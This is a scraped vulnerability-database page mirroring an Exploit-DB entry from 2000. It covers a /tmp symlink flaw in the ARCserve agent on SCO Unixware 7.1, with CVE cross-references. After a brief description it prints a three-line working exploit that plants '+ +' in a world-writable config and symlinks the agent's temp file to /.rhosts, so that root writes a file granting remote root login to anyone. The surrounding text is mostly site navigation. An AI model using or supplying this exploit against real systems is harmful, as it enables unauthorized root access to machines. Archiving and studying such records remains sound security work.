Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbShawn BrackenEDB-ID:19752
HistoryFeb 15, 2000 - 12:00 a.m.

SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink

2000-02-1500:00:00
Shawn Bracken
www.exploit-db.com
20

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/988/info

A symlink following vulnerability exists in the ARCserve agent, as shipped with SCO Unixware 7. Upon startup, the asagent program will create several files in /tmp. These are created mode 777, and can be removed and replaced by any user on the system. If these are replaced with symlinks, files can be created anywhere on the filesystem, owned by root. This cannot be used to alter the permissions of existing files. However, the contents of the new file are contained in /usr/CYEagent/agent.cfg. This file is world writable. 

echo "+ +" > /usr/CYEagent/agent.cfg
rm /tmp/asagent.tmp
ln -sf /.rhosts /tmp/asagent.tmp

Related

nvd 2
cvelist 2
cve 2
nvd
nvd
CVE-2000-0154
2000-02-16 05:00:00
CVE-2000-0224
2000-02-15 05:00:00
cvelist
cvelist
CVE-2000-0154
2000-02-23 05:00:00
CVE-2000-0224
2000-04-10 04:00:00
cve
cve
CVE-2000-0154
2000-02-23 05:00:00
CVE-2000-0224
2000-04-10 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:19752
nvd2cvelist2cve2